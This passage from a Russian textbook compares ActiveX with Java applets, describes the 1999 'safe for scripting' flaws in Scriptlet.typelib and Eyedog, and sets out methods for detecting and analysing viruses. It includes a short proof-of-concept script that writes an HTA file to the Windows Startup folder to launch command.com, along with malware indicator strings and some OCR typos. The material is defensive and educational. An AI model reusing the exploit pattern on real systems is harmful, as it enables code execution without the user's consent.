Технологии по созданию и использованию программных компонен- тов ActiveX Controls, а также программ, написанных на макроязыке VBScript, являются собственными разработками Microsoft. На сервере для действенности технологий ActiveX должны функци- онировать общесистемные программные средства от Microsoft: операци- онная система Windows NT Server и Web-сервер IIS (Internet Information Server). Взаимодействие Web-сервера IIS с другими приложениями, например с системой управления базами данных (СУБД), обеспечивает- ся за счет реализованных в нем интерфейсов ISAPI (Internet Server API) и CGI (Common Gateway Interface). Программные компоненты ActiveX Controls представляют собой обычные исполняемые программы, которые могут загружаться с сервера для испол нения на рабочей станции. Как и при использовании Java- аплетов ссылки на эти программы располагаются в Web-документах. Непосредственно в со став Web-документов программные компоненты ActiveX Controls не входят. Они хранятся в отдельных файлах на сервере.
206 Компоненты ActiveX Controls отличаются от Java-аплетов следую- щими особенностями: программы ActiveX Controls включают исполняемый код, завися- щий от аппаратно-операционной платформы; байт-коды же Java-аплетов являются машинно-независимыми; загруженные элементы ActiveX Controls остаются в клиентской си- стеме, тогда как аплеты Java необходимо каждый раз загружать заново; поскольку программы ActiveX Controls не работают подобно Java- аплетам под контролем диспетчера безопасности, они могут получать доступ к дискам и выполнять другие функции, характерные для тради- ционных приложений. Учитывая, что программы ActiveX Controls по сути являются обыч- ными программными приложениями, то их разработка может осуществ- ляться с помощью любого языка программирования. Могут быть ис- пользованы такие инструментальные системы, как Visual C++, Visual Basic, Delphi, Visual J++ и ряд других. Разработан и комплексный ин- струментальный пакет Microsoft ActiveX Development Kit (MADK). Программные компоненты ActiveX Controls, а также программы, написан ные на макроязыках JavaScript и VBScript, могут включать вы- зовы функций API ActiveX по предоставлению ряда сервисов, таких как: создание высококачественных мультимедийных эффектов; открытие и редактирование электронных документов путем обра- щения к приложениям, поддерживающим стандарт OLE (связывание и встраивание объектов), например, к приложениям Microsoft Office; обращения к операционной системе для оптимальной настройки пара метров выполнения полученных с сервера программ. Программы, написанные на макроязыках JavaScript и VBScript, мо- гут автоматизировать взаимодействие между множеством объектов, включая аплеты Java, программные компоненты ActiveX Controls и дру- гие программы на клиентском компьютере, позволяя им работать вместе как часть интегрированного активного пространства Web. Можно напи- сать свой макроязык и добавить его интерпретатор в браузер Internet Ex- plorer с помощью динамически загружаемой библиотеки DLL. В сравнении с технологией Java технология ActiveX Controls имеет как недостатки, так и преимущества. Недостатки связаны прежде всего с более низким уровнем безопас- ности распределенной обработки информации. Программные компонен- ты ActiveX Controls, загруженные на клиентскую систему, могут обра- щаться к любой ее части подобно обычному приложению. Microsoft реа-
207 лизовала в рамках ActiveX доверительную защиту на основе цифровых сертификатов, которые обеспечивают подтверждение подлинности за- груженных с сети программных компонентов. Однако подтверждение подлинности еще не означает подтверждение безопасности. Кроме того, схема доверительной защиты ActiveX может оказаться недейственной, когда пользователи загружают программные компоненты ActiveX Con- trols из Internet, особенно из неизвестных или сомни тельных источни- ков. Вместе с тем программные компоненты ActiveX Controls, в отличие от Java-аплетов, позволяют реализовать функции, свойственные полно- масштабным программным приложениям. Эта особенность для распре- деленной обработки является существенным преимуществом при усло- вии принятия соответствующих мер безопасности, например, при раз- решении загрузки программ ActiveX Controls только с серверов корпо- рации. Что же касается производительности, то поскольку Java является интерпретируемым языком, аплеты Java выполняются на виртуальной машине клиентской системы с меньшей скоростью, чем скомпилирован- ные элементы ActiveX Controls. Но с другой стороны, аплеты Java очень компактны, по этому загружаются быстро. Для загрузки же программ ActiveX Controls требуется большее время. Следует также учесть, что за- груженные программы ActiveX Controls остаются в клиентской системе, тогда как все аплеты Java необходимо каждый раз загружать заново. Эта особенность с точки зрения безопасности является недостатком, так как нарушается централизация прикладной системы. Но с точки зрения про- изводительности достигается пре имущество перед Java-аплитами. По независимости от аппаратных и операционных платформ Ac- tiveX уступает Java-технологии. ActiveX слабо обеспечивает поддержку операционных систем Macintosh, Sollaris и UNIX. Технология ActiveX лучше работает на платформах Microsoft Windows, поскольку разрабо- таны преимущественно для использования функций, встроенных в эти операционные системы. Соответственно в полной мере ActiveX может использоваться в сетях, работающих под управлением операционных систем Microsoft Windows. Обычно файлы с элементами управления ActiveX имеют расшире- ние ОСХ исключением являются элементы управления ActiveX, напи- санные на Java. Они являются в Web-страницы с помощью дескриптора OBJECT, в котором указано, откуда элемент управления нужно загру- зить. Когда браузер Internet Explorer обрабатывает Web-страницу с внед-
208 ренным в нее элементом управления ActiveX (или несколькими элемен- тами управления), первым делом он обращается к локальному систем- ному реестру. Там он пытается определить, имеется ли на компьютере требуемый компонент. Если это так, Internet Explorer отображает Web- страницу, загружает элемент управления в свое адресное пространство и выполняет его код. Если необходимый элемент управления не найден, Internet Explorer загружает его из того места, какое указано в дескрипто- ре <OBJECT>, и устанавливает на компьютере пользователя, кроме того, с помощью сертификатов Authenticode, браузер выполняет верификацию автора кода, а затем запускает его. По умолчанию элементы управления дислоцируются в каталоге \windows\loccache.
4.5.8. Типовые уязвимости в элементах ActiveX
Флаг "Safe for scripting" технологии ActiveX
Летом 1999 года были обнаружены два изъяна в методе обработки элементов ActiveX браузером Internet Explorer. Установив для элементов управления флаг "safe for scripting" ("помеченный как безопасный"), их разработчики могут полностью обойти обычную процедуру проверки сертификатов Authenticode. В качестве примеров таких элементов Ac- tiveX можно привести Scriptlet.typelib и Eyedog.ocx, предназначенные для использования в IE4 и более ранних версиях. Если для этих элемен- тов управления установлен флаг "safe for scripting", то при их запуске в браузере на экран не будет выводиться никаких сообщений. Scriptlet, и Eyedog имеют доступ к файловой системе пользователя. Элемент Scriptlet.typelib позволяет создавать, редактировать и перезапи- сывать файлы, хранящиеся на локальном диске, a Eyedog — обращаться к системному реестру и осуществлять сбор информации о технических параметрах компьютера. В интерненте присутствует проверочный код для элемента управ- ления Scriptlet, который помещает в каталог startup удаленного компью- тера исполняемый текстовый файл с расширением .НТА (приложение HTML— HTML Application). При следующей перезагрузке системы этот файл выполняется, и на экране отображается без обидное сообщение. Ниже приведен код, реализующий данную идею. <object id="scr" ciassid="clsid:06290bd5-48AA-11D2-8432-006008C3FBFC"> <object> <SCRIPT>
209 scr.Reset(); scr.Path="C:\\windows\\Start Menu\\Programs\\StartUp\\haker.hta"; scr.Doc="<object id='wsh' classied='clsid:F935DC22-1CF0-11D0-ADB9- 00C04FD58A0B'></object><SCRIPT>alert('Это зловредный код'); wsh.Run('c:\\command.com');</"+"SCRIPT>"; scr.write(); </SCRIPT> </object> Эта уязвимость интерфейсов программного обеспечения, позволя- ющая получить к ним доступ, названа "случайным троянским ко нем". Установленные на жесткий диск многих пользователей вместе с таким популярными приложениями, как IE, данные элементы управления Ac- tiveX ожидают, пока кто-нибудь не установит с ними удаленное соеди- нение. Масштабы потенциального воздействия могут быть устрашающи- ми. Чтобы установить флаг "safe for scripting" для элемента управления ActiveX, нужно либо реализовать в них интерфейс lobjectsafety, либо пометить их как безопасные. Для этого в систем ном реестре в ключ Im- plemented Categories, соответствующий данному элементу управления, необходимо добавить параметр 7DD95801-9882-11CF-9FA9- OOAA006C42C4. Зачастую в системном реестре Windows находится не- сколько десятков таких элементов управления. Для подобных атак могут быть использованы те из них, которые могут выполнять действия с по- вышенными привилегиями (например, запись на диск или запуск кода). Есть несколько способов, позволяющих определить, какие из эле- ментов управления активно используются системой. Для обычного про- смотра активных приложений включая элементы управления ActiveX, установленных на компьютере, необходимо в меню Start, выбрать коман- ду Run и ввести dcomcnfg. При этом на экране явится диалоговое окно. Чтобы посмотреть, имеются ли среди этих объектов помеченные как "safe for ripting",можно воспользоваться утилитой oleview из набора NT Resource Kit (ее более новая версия входит в среду разработки при- ложений Visual Studio компании Microsoft), утилита oleview позволяет просмотреть все зарегистрированные в системе объекты ActiveX. Кроме того, она выводит их идентификатор класса (CLSID), используемый при обращении к этим объектам в системном реестре, и многие важные па- раметры из поддерева Implemented Categories системного реестра.
210 Кроме того, утилита oleview отображает интерфейсы, экспортируе- мые объектами, что помогает понять, является ли данный объект хоро- шей целью для взломщика. Год спустя был обнаружен еще один подобный элемент управления под именем Office 2000 UA (OUA), который может быть удаленно ин- сталлирован с помощью специального кода, внедренного на Web- странице. Он регистрируется: - системой во время установки компонентов Microsoft Office; - макросом документов Office без предупреждения пользователя. Далее с этой страницы загружается файл с именем evil.doc, в кото- ром содержится простой макрос, создающий файл С:\dildog-was-here.txt.
4.6. Методы и способы обнаружения и анализа алгорит-
ма вируса 4.6.1. Анализ алгоритма вируса
Методика обнаружения вируса состоит из следующих этапов:
1. Выявить подозрительные проявления: Наличие autorun.inf файлов в корнях дисков; Блокирование доступа к определенным сайтам (обычно, анти- вирусным); Изменение файла hosts; Блокирование запуска антивирусных программ; Украденные аккаунты к программам/сайтам или похищенная виртуальная собственность из MMORPG; Несанкционированное открытие веб-страниц; Измененная стартовая страница браузера; Всплывающие окна в браузере; Отключение стандартных служб Windows (Windows Security Center Service, Windows Firewall/Internet Connection Sharing (ICS) и т.д.); Интенсивная дисковая или сетевая активность; Установленные программы не запускаются. 2. Выявить подозрительную активность, используя Process Monitor и другие утилиты: Чтение всех подряд файлов или файлов по определенной маске (Email-Worms); Открытие различных файлов и запись в них (Viruses, Trojan- Ransoms);
211 Открытые сетевые порты (Backdoors) IRC-трафик (Backdoors/Bots); Интенсивный Интернет-трафик (Backdoors, Trojan-Proxies). 3. Используя антируткит-утилиты, проверить наличие активных рут- китов и обезвредить их: Использовать разнообразные утилиты для более полного ана- лиза; Выявить системные перехватчики и снять их; Выявить файлы, установившие системные перехватчики. 4. Исследовать процессы. Отбросить все процессы, файлы которых подписаны Microsoft, и среди оставшихся выявить подозрительные: Упакованные образы (особенно, в %SYSTEM%); С именами процессов, похожими на системные, но файлы кото- рых расположены в других каталогах; Внедренные в системные процессы DLL-файлы (особенно, упа- кованные библиотеки); Без цифровой подписи4 Открывающие подозрительные порты (39999 etc); В дампе памяти которых есть подозрительные строки: Имена антивирусных процессов AVP, AVPCC, AVPM и т.д. IRC-команды NICK, USER, JOIN, PASS и т.д.; SMTP-команды и связанные HELO, RCPT, MAIL и т.д.; Подозрительные строки Kaspersky., symantec., fsecure. и т.д. Autorun.inf Подозрительные URL-адреса ***.85.161.165/1.exe; Имена P2P-клиентов и пути к их папкам KAZAA, EMULE и т.д.; Названия MMORPG и банков o LINEAGE.EXE и т.д.; Названия дистрибутивов программных продуктов KAZAA.EXE, MSN.EXE, AOL.EXE и т.д.; Пути к файлам конфигурации различных программ %USERPROFILE%\APPLICATION DATA\OPERA\PRO- FILE\WAND.DAT\WS_FTP.EXE; Ресурсы общего доступа по умолчанию ADMIN$, C$, D$; Многочисленные строки, напоминающие перебираемые пароли, представленные в алфавитном порядке 111111, admin, root; Ключи автозапуска системного реестра;
212 Классы диалоговых окон антивирусов AVP.AhAppChangedDialog. 5. Проверить точки автозапуска программ, используя утилиту Autoruns: Сузить диапазон исследования, отбросив файлы c цифровой под- писью Microsoft; Выявить подозрительные файлы. 6. Определить подозрительные файлы: Файлы выявленных подозрительных процессов; Исполняемые файлы в директории %SYSTEM%, имеющие дату, наиболее позднюю или отличающуюся от массы остальных файлов. Наиболее удобным для хранения и анализа вируса объектом является файл, содержащий его (вируса) тело. Как показывает практика, для ана- лиза файлового вируса удобнее иметь несколько зараженных файлов раз- личной, но не очень большой, длины. При этом желательно иметь зара- женные файлы всех типов (COM, EXE, SYS, BAT, NewEXE), поражае- мых вирусом. Если необходимо проанализировать часть оперативной па- мяти, то при помощи некоторых утилит (например, AVPUTIL.COM) до- вольно просто выделить участок, где расположен вирус, и скопировать его на диск. Если же требуется анализ сектора MBR или boot-сектора, то скопировать их в файлы можно при помощи DiskEdit или AVPUTIL. Для хранения загрузочного вируса наиболее удобным является файл-образ за- раженного диска. Для его получения необходимо отформатировать дис- кету, заразить ее вирусом, скопировать образ дискеты (все сектора, начи- ная с нулевого и кончая последним) в файл. Главными моментами анализа вируса являются: определение сигнатуры вируса; вскрытие механизма размножения; выявление характера деструктивных воздействий; нахождение процедуры восстановления зараженного файла; установление алгоритма выполнения вируса; определение места вируса в классификации вирусов. Анализ вирусов проводится с использованием отладочных и дизас- семблерных программ-утилит. Несложные вирусы малого объема срав- нительно легко поддаются вскрытию с помощью только отладчика (например, DEBUG, AFD, Quad Analizer и другие). Повышение сложно- сти вируса вынуждает использовать дисассемблеры (DisDoc, IDA и дру- гие). При анализе файлового вируса определяются: типы заражаемых файлов (EXE,COM,SYS),
213 место внедрения в файл (начало, середина, конец), место хранения восстанавливаемой информации файла, объем восстановления файла. При анализе загрузочного вируса важно определить адрес сектора, в котором вирус сохраняет первоначальный загрузочный сектор. Для резидентных вирусов, ко всему прочему, определению подлежат: адреса точек входа в программы обработки перехватываемых прерываний; место размещения в оперативной памяти своей резидентной копии; возможность записи тела вируса в системные области DOS и BIOS по фиксированным адресам; способность уменьшения размера памяти, выделенной под DOS; способность создания для себя специального MCB-блока. Процедура восстановления зараженных программ может быть найдена после отыскания участка вирусного кода, восстанавливающего зараженную программу перед возвратом ей управления. Часть файла, в которой найден вирус, забивается нулями. Анализ вирусов высокой сложности (маскирующихся, зашифрован- ных, самомодифицирующихся) является далеко непростым делом. При решении этих задач не обойтись без дизассемблера или отлад- чика (например, отладчиков AFD, AVPUTIL, SoftICE, TurboDebugger, дизассемблеров Sourcer или IDA). И отладчики, и дизассемблеры имеют и положительные и отрица- тельные черты - каждый выбирает то, что он считает более удобным. Несложные короткие вирусы быстро "вскрываются" стандартным от- ладчиком, при анализе объемных и высокосложных полиморфных, стелс-вирусов не обойтись без дизассемблера. Если необходимо быстро обнаружить метод восстановления пораженных файлов, достаточно пройтись отладчиком по началу вируса до того места, где он восстанав- ливает загруженную программу перед тем, как передать ей управление (фактически именно этот алгоритм чаще всего используется при лече- нии вируса). Если же требуется получить детальную картину работы ви- руса или хорошо документированный листинг, то кроме дизассемблеров Sourcer или IDA с их возможностями восстанавливать перекрестные ссылки, здесь вряд ли что поможет. К тому же следует учитывать, что, во-первых, некоторые вирусы достаточно успешно блокируют попытки
214 протрассировать их коды, а во-вторых, при работе с отладчиком суще- ствует ненулевая вероятность того, что вирус вырвется из-под контроля. При анализе файлового вируса необходимо выяснить, какие файлы (COM, EXE, SYS) поражаются вирусом, в какое место (места) в файле записывается код вируса - в начало, конец или середину файла, в каком объеме возможно восстановление файла (полностью или частично), в каком месте вирус хранит восстанавливаемую информацию. При анализе загрузочного вируса основной задачей является выяс- нение адреса (адресов) сектора, в котором вирус сохраняет первоначаль- ный загрузочный сектор (если, конечно, вирус сохраняет его). Для резидентного вируса требуется также выделить участок кода, со- здающий резидентную копию вируса и вычислить возможные адреса точек входа в перехватываемые вирусом прерывания. Необходимо также опре- делить, каким образом и где в оперативной памяти вирус выделяет место для своей резидентной копии: записывается ли вирус по фиксированным адресам в системные области DOS и BIOS, уменьшает ли размер памяти, выделенной под DOS (слово по адресу [0000:0413]), создает ли для себя специальный MCB-блок либо использует какой-то другой способ. Существуют особые случаи, когда анализ вируса может оказаться очень сложной для пользователя задачей, например при анализе поли- морфного вируса. В этом случае используются программы - анализато- ры кодов программ. Для анализа макро-вирусов необходимо получить текст их макро- сов. Для нешифрованных не-стелс вирусов это достигается при помощи меню Tools/Macro. Если же вирус шифрует свои макросы или использу- ет стелс-приемы, то необходимо воспользоваться специальными утили- тами просмотра макросов. Такие специализированные утилиты есть практически у каждой фирмы-производителя антивирусов, однако они являются утилитами "внутреннего пользования" и не распространяются за пределы фирм.
4.6.2. Обнаружение неизвестного вируса
В этом случае необходимо, перед использованием антивирусных
программ и утилит загрузить компьютер с резервной копии ОС, распо- ложенной на заведомо чистой от вирусов и защищенной от записи дис- кете или другом носителе, и в дальнейшем использовать программы только с дискет или других носителей. Это необходимо для того, чтобы застраховаться от резидентного вируса, так как он может блокировать работу программ или использовать их работу для инфицирования про-
215 веряемых файлов/дисков. Более того, существует большое количество вирусов, уничтожающих данные на диске, если они "подозревают", что их код может быть обнаружен. Конечно же, это требование никак не от- носится к макро-вирусам. Обнаружение загрузочного вируса В загрузочных секторах дисков расположены, как правило, неболь- шие программы, назначение которых состоит в определении размеров и границ логических дисков (для MBR винчестера) или загрузке операци- онной системы (для boot-сектора). В начале следует прочитать содержимое сектора, подозрительного на наличие вируса. Для этой цели удобно использовать DiskEdit или AVPUTIL. Некоторые загрузочные вирусы практически сразу можно обнару- жить по наличию различных текстовых строк (например, вирус "Stoned" содержит строки: "Your PC is now Stoned!", "LEGALISE MARIJUANA!"). Некоторые вирусы, поражающие boot-секторы дисков, наоборот, определяются по отсутствию строк, которые обязательно должны присутствовать в boot-секторе. К таким строкам относятся име- на системных файлов (например, строка "IO.SYS MSDOS.SYS") и стро- ки сообщений об ошибках. Отсутствие или изменение строки-заголовка boot-сектора (строка, содержащая номер версии ОС или название фир- мы-производителя программного обеспечения, например, "MSDOS5.0" или "MSWIN4.0") также может служить сигналом о заражении вирусом. Стандартный загрузчик ОС, расположенный в MBR, занимает меньше половины сектора, и многие вирусы, поражающие MBR винче- стера, довольно просто заметить по увеличению длины кода, располо- женного в секторе MBR. Однако существуют вирусы, которые внедряются в загрузчик без изменения его текстовых строк и с минимальными изменениями кода за- грузчика. Для того чтобы обнаружить такой вирус, в большинстве слу- чаев достаточно отформатировать дискету на заведомо незараженном компьютере, сохранить в виде файла ее boot-сектор, затем некоторое время использовать ее на зараженном компьютере (записать/прочитать несколько файлов), а после этого на незараженном компьютере сравнить ее boot-сектор с оригинальным. Если в коде загрузочного сектора про- изошли изменения - вирус пойман. Существуют также вирусы, использующие более сложные приемы заражения, например, изменяющие при инфицировании MBR всего 3
216 байта Disk Partition Table, соответствующие адресу активного загрузоч- ного сектора. Для идентификации такого вируса придется провести бо- лее детальное исследование кодов загрузочного сектора вплоть до пол- ного анализа алгоритма работы его кода. Приведенные рассуждения основываются на том, что стандартные загрузчики (программы, записываемые операционной системой в загру- зочные сектора) реализуют стандартные алгоритмы загрузки операци- онной системы и оформляются в соответствии с ее стандартами. Если же диски отформатированы утилитами, не входящими в состав DOS (например, Disk Manager), то для обнаружения в них вируса следует проанализировать алгоритм работы и оформление загрузчиков, создава- емых такой утилитой. Обнаружение файлового вируса Как отмечалось, вирусы делятся на резидентные и нерезидентные. Встречавшиеся до сих пор резидентные вирусы отличались гораздо большим коварством и изощренностью, чем нерезидентные. Поэтому для начала рассмотрим простейший случай - поражение компьютера не- известным нерезидентным вирусом. Такой вирус активизируется при за- пуске какой-либо зараженной программы, совершает все, что ему поло- жено, передает управление программе-носителю и в дальнейшем (в от- личие от резидентных вирусов) не будет мешать ее работе. Для обнару- жения такого вируса необходимо сравнить длины файлов на винчестере и в дистрибутивных копиях (упоминание о важности хранения таких ко- пий уже стало банальностью). Если это не поможет, то следует побайтно сравнить дистрибутивные копии с используемыми программами. Можно также просмотреть дамп выполняемых файлов. В некото- рых случаях можно сразу обнаружить присутствие вируса по наличию в его коде текстовых строк. Многие вирусы, например, содержат строки: ".COM", "*.COM", ".EXE", "*.EXE", "*.*", "MZ", "COMMAND" и т.д. Эти строки часто встречаются в начале или в конце зараженных файлов. Существует и еще один способ визуального определения заражен- ного вирусом файла. Он основан на том, что выполняемые файлы, ис- ходный текст которых написан на языке высокого уровня, имеют вполне определенную структуру. В случае Borland или Microsoft C/C++ сегмент кода программы находится в начале файла, а сразу за ним - сегмент дан- ных, причем в начале этого сегмента стоит строка-копирайт фирмы- изготовителя компилятора. Если в дампе такого файла за сегментом
217 данных следует еще один участок кода, то вполне вероятно, что файл заражен вирусом. То же справедливо и для большинства вирусов, заражающих файлы Windows. В выполняемых файлах этих ОС стандартным является раз- мещение сегментов в следующем порядке: сегмент(ы) кода, за которыми следуют сегменты данных. Если за сегментом данных идет еще один сегмент кода, это также может служить сигналом о присутствии вируса. Пользователям, знакомым с языком Ассемблер, можно попробовать разобраться в кодах подозрительных программ. Для быстрого просмотра лучше всего подходит HIEW (Hacker's View). Для более подробного изу- чения потребуется дизассемблер - Sourcer или IDA. Рекомендуется запустить одну из резидентных антивирусных про- грамм-мониторов и следить за ее сообщениями о "подозрительных" дей- ствиях программ (запись в COM- или EXE-файлы, запись на диск по аб- солютному адресу и т.п.). Существуют мониторы, которые не только пе- рехватывают такие действия, но и сообщают адрес, откуда поступил "подозрительный" вызов (к таким мониторам относится AVPTSR.COM). Обнаружив подобное сообщение, следует выяснить, от какой программы оно пришло, и проанализировать ее коды при помощи резидентного ди- зассемблера (например, AVPUTIL.COM). При анализе кодов программ, резидентно находящихся в памяти, большую помощь часто оказывает трассирование прерываний 13h и 21h. Следует отметить, что резидентные DOS-мониторы часто оказыва- ются бессильны, если работа ведется в DOS-окне под Windows95/NT, по- скольку Windows95/NT позволяют вирусу работать "в обход" монитора (как, впрочем, и всех остальных резидентных программ). DOS-мониторы также неспособны остановить распространение Windows-вирусов. Рассмотренные выше методы обнаружения файловых и загрузоч- ных вирусов подходят для большинства как резидентных, так и нерези- дентных вирусов. Однако эти методы не срабатывают, если вирус вы- полнен по технологии "стелс", что делает бесполезным использование большинства резидентных мониторов, утилит сравнения файлов и чте- ния секторов. Обнаружение резидентного вируса Если в компьютере обнаружены следы деятельности вируса, но ви- димых изменений в файлах и системных секторах дисков не наблюдается, то вполне возможно, что компьютер поражен одним из "стелс"-вирусов. В этом случае необходимо загрузить DOS с заведомо чистой от вирусов
218 дискеты, содержащей резервную копию DOS, и действовать, как и при поражении нерезидентным вирусом. Однако иногда это нежелательно, а в ряде случаев невозможно (известны, например, случаи покупки новых компьютеров, зараженных вирусом). Тогда придется обнаружить и нейтрализовать резидентную часть вируса, выполненную по технологии "стелс". Существует несколько способов инфицирования памяти. DOS-вирусы 1. Вирус может проникнуть в таблицу векторов прерываний Лучший способ обнаружить такой вирус состоит в том, чтобы про- смотреть карту распределения памяти, которая отображает список рези- дентных программ (пример такой карты приведен рис. 35). Подробная карта памяти сообщает информацию о всех блоках, на которые разбита память: адрес блока управления памятью MCB, имя программы- владельца блока, адрес ее префикс программного сегмента (PSP) и спи- сок перехватываемых блоком векторов прерываний. При наличии вируса в таблице векторов прерываний, утилиты, отображающие карту распределения памяти (например, AVPUTIL.COM), начинают "шуметь".
Рис. 35. Карта распределения незараженной памяти
219 Рис. 36. Таблица векторов прерываний поражена вирусом Другой, более надежный, но требующий высокой квалификации пользователя способ, - просмотреть таблицу векторов прерываний с по- мощью дизассемблера. Если при этом будут обнаружены коды какой-то программы, то код вируса (или участок кода) найден. 2. Вирус может несколькими способами встроиться в DOS: в произ- вольный системный драйвер, в системный буфер, в другие рабочие области DOS (например, в область системного стека или в свобод- ные места таблиц DOS и BIOS). Наиболее "популярным" способом инфицирования вирусом произ- вольного системного драйвера является прикрепление тела вируса к файлу, содержащему драйвер, и модификация заголовка поражаемого драйвера. Если при этом вирус оформляет себя как отдельный драйвер, то его можно обнаружить при просмотре карты распределения памяти, содержащей список системных драйверов. Если при этом в списке при- сутствует драйвер, который не описан в файле CONFIG.SYS, то он и может быть вирусом. Если же вирус "приклеивается" к расположенному перед ним драйверу, не выделяя свои коды как отдельную программу- драйвер, то обнаружить его можно методами, описанными ниже. Вирус, встраивающийся в системный буфер, должен уменьшать об- щее число буферов; в противном случае он будет уничтожен последую-
220 щими операциями считывания с диска. Достаточно несложно написать программу, которая подсчитывает число буферов, реально присутствую- щих в системе, и сравнивает полученный результат со значением команды BUFFERS, расположенной в файле CONFIG.SYS (если команда BUFFERS отсутствует, то со значением, устанавливаемым DOS по умолчанию). Существует достаточно способов внедрения вируса в системные таблицы или область стека DOS. Однако реализация этих способов по- требует от автора вируса досконального знания различных версий DOS. К тому же свободного места в DOS не так уж много, и поэтому написа- ние полноценного "стелс"-вируса такого типа маловероятно. Если же все-таки подобный вирус появится, то обнаружить его код можно дизас- семблированием "подозрительных" на наличие вируса участков DOS. 3. Вирус может проникнуть в область программ в виде: отдельной резидентной программы или отдельного блока памяти (MCB); внутри или "приклеившись" к какой-либо резидентной программе. Если вирус внедряется в отведенную для прикладных программ об- ласть памяти в виде нового блока, создавая для себя собственный MCB, или как отдельная резидентная программа, то его можно обнаружить при просмотре подробной карты распределения памяти, отображающей адреса всех блоков MCB. Обычно такой вирус выглядит как отдельный блок памяти (см. рис. 37), не имеющий имени и перехватывающий один или несколько векторов прерываний (например, INT 8, 13h, 1Ch, 21h). Следует отметить, что вирус может выделить себе блок памяти как в обычной (conventional), так и в верхней памяти (UMB).
Рис. 37. Вирус в области пользовательских программ
221 4. Вирус может проникнуть за границу памяти, выделенной под DOS.
047D 0000 0,04 K блок свободен 0482 03D8 0,15 K COMMAND.COM 0493 0493 23,20 K AVPTSR.COM 10, 1B, 23, 26, 27,28 2F, 40 08F5 03D8 618,64 K COMMAND.COM 30 A000 0008 136,09 K DOS C13A - 1,20 K DOS C186 - 54,96 K блок свободен
вирус “Tremor”, маскирующийся под блок DOS
Рис. 38. Вирус в области пользовательских программ (UMB)
222 Рис. 39. Уменьшение размера вирусов DOS-памяти Практически все загрузочные и некоторые файловые вирусы распо- лагаются за пределами памяти, выделенной для DOS, уменьшая значе- ние слова, расположенного по адресу [0040:0013]. В этом случае первый мегабайт памяти компьютера выглядит так: Обнаружить такие вирусы очень просто - достаточно узнать емкость оперативной памяти и сравнить ее с реальной. Если вместо 640K систе- ма сообщит меньшее значение, то следует просмотреть дизассемблером "отрезанный" участок памяти. Если на этом участке будут обнаружены коды какой-то программы, то, скорее всего, вирус найден. Пример такого распределения памяти приведен на рис. 40. 00000 Память DOS 00000 Память DOS
XXXX0h “Вырезанный” вирусом
участок памяти A0000h Видео-память A0000h Видео-память
C0000h ROM BIOS C0000h ROM BIOS
Рис. 40. Распределение памяти зараженного компьютера
5. Вирус может встраиваться в конкретные, заведомо резидентные программы или "приклеиться" к уже имеющимся блокам памяти. Возможно инфицирование вирусом файлов DOS, которые являются резидентными (например, IO.SYS, MSDOS.SYS, COMMAND.COM), за- гружаемых драйверов (ANSY.SYS, COUNTRY.SYS, RAMDRIVE.SYS) и др. Обнаружить такой вирус гораздо сложнее вследствие малой скоро- сти его распространения, но, однако, вероятность атаки подобного виру- са значительно меньше. Все чаще стали встречаться "хитрые" вирусы, которые корректируют заголовки блоков памяти или "обманывают" DOS таким образом, что блок с кодами вируса становится одним целым с предыдущим блоком памяти. В этом случае обнаружить вирус гораздо сложнее - необходимо знать реальную длину программ, размещенных в памяти, и список пре-
223 рываний, которые они перехватывают. Но этот способ не очень удобен и иногда не срабатывает. Поэтому рекомендуется использовать другой ме- тод, который может облегчить выявление вируса в подобной ситуации. Он основан на следующем свойстве - подавляющее большинство виру- сов для обнаружения незараженных файлов или секторов дисков пере- хватывает прерывания 13h или 21h, встраиваясь в обработчик прерыва- ния. В таком случае для обнаружения вируса достаточно просмотреть текст (команды ассемблера) обработчиков указанных прерываний (например, при помощи программы AVPUTIL.COM). Правда для того, чтобы отличить вирус от обычных программ, требуется достаточный опыт работы с вирусами и некоторое представление о структуре обра- ботчика на незараженном компьютере. К тому же следует быть осто- рожным: существует несколько вирусов, которые "завешивают" систему при попытке трассировки их кодов. Известны вирусы, которые при заражении файлов или дисков не пользуются прерываниями, а напрямую работают с ресурсами DOS. При поиске подобного вируса необходимо тщательно исследовать изменения во внутренней структуре зараженной DOS: список драйверов, таблицы файлов, стеки DOS и т.д. Это является очень кропотливой работой, и, учитывая многочисленность версий DOS, требует очень высокой квали- фикации пользователя. Конечно, существуют и другие, достаточно экзотические способы инфицирования памяти вирусом, например внедрение вируса в видеопа- мять, в High Memory Area (HMA) или в расширенную память (EMS, XMS), но подобные вирусы встречаются достаточно редко и всегда про- являлись хотя бы одним из перечисленных выше признаков. Существу- ют также монстры, использующие защищенный режим процессоров i386 и выше. К счастью, известные вирусы такого типа либо "не живут" вме- сте с современными операционными системами и поэтому слишком за- метны, либо не используют стелс-приемов. Однако появление полно- ценного стелс-DOS-вируса, работающего в защищенном режиме, вполне реально. Такой вирус будет невидим для DOS-задач и обнаружить его будет возможно, только либо перенеся зараженные файлы на незара- женный компьютер, либо после перезагрузки ОС с чистого носителя. Windows-вирусы Обнаружение резидентного Windows-вируса является крайне слож- ной задачей. Вирус, находясь в среде Windows как приложение или VxD-двайвер, практически невидим, поскольку одновременно активны несколько десятков приложений и VxD, и вирус по внешним признакам
224 от них ничем не отличается. Для того, чтобы обнаружить программу- вирус в списках активных приложений и VxD, необходимо досконально разбираться во "внутренностях" Windows и иметь полное представление о драйверах и приложениях, установленных на данном компьютере. Поэтому единственный приемлемый способ поймать резидентный Windows-вирус - загрузить DOS и проверить запускаемые файлы Windows методами, описанными выше. Обнаружение макро-вируса Характерными проявлениями макро-вирусов являются: - невозможность конвертирования зараженного документа Word в другой формат; - зараженные файлы имеют формат Template (шаблон), поскольку при заражении макро-вирусы конвертируют файлы из формата Word Document в Template; - невозможность записи документа в другой каталог/на другой диск по команде "Save As"; - в STARTUP-каталоге присутствуют "чужие" файлы; - наличие в Книге (Book) лишних и скрытых Листов (Sheets). Для проверки системы на предмет наличия вируса можно использо- вать пункт меню Tools/Macro. Если обнаружены "чужие макросы", то они могут принадлежать вирусу. Однако этот метод не работает в случае стелс-вирусов, которые запрещают работу этого пункта меню, что, в свою очередь, является достаточным основанием считать систему зара- женной. Многие вирусы имеют ошибки или некорректно работают в раз- личных версиях Word/Excel, в результате чего Word/Excel выдают со- общения об ошибке, например: WordBasic Err = номер ошибки Если такое сообщение появляется при редактировании нового до- кумента или таблицы и при этом заведомо не используются какие-либо пользовательские макросы, то это также может служить признаком за- ражения системы. Сигналом о вирусе являются и изменения в файлах и системной конфигурации Word, Excel и Windows. Многие вирусы тем или иным об- разом меняют пункты меню Tools/Options - разрешают или запрещают функции "Prompt to Save Normal Template", "Allow Fast Save", "Virus Protection". Некоторые вирусы устанавливают на файлы пароль при их
